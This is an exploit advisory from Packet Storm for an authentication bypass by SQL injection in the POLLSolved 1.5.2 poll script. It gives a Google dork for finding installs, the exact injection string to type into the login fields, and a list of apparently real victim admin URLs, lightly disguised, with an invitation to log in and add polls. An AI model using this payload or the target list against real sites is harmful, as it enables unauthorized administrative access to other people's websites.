POLLSolved version 1.5.2 suffers from a remote SQL injection vulnerability that allows for authentication bypass. Support for this script is deprecated.
8d37108dc1944aac38df5b9bf07bc559d1b8b588512f97bfada3e2f3fe0ca082######################
# Exploit Title : POLLSolved Authentication Bypass
# Exploit Author : Persian Hack Team
# Vendor Homepage : https://www.usolved.net/
# Google Dork : intitle:POLLSolved
# Date: 2015/11/12
# Version : v1.5.2
#
######################
# PoC:
#To bypass the login page enter '=' 'or' for username and password input.
#Login And Add Your Poll D:
#
#
#Demo:
#https://kleckserupload.squXare7.ch/pollsolved/admin.php
#https://www.swissfleckviXeh.ch/Umfrage/admin.php
#https://www.harzerpanXorama.de/pool/admin.php
#https://schlagerheilo.Xde/pollsolved/admin.php
#https://www.ccbsayXit.com/pollsolved/admin.php
#https://www.woodXforsims.de/Upoll/admin.php
#www.smital.at/poll/admin.php
#
#
#And Replace Admin.php With Poll.php
######################
# discovered by :
# Mojtaba MobhaM (kazemimojtaba@live.com)
# T3NZOG4N (t3nz0g4n@yahoo.com)
######################
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed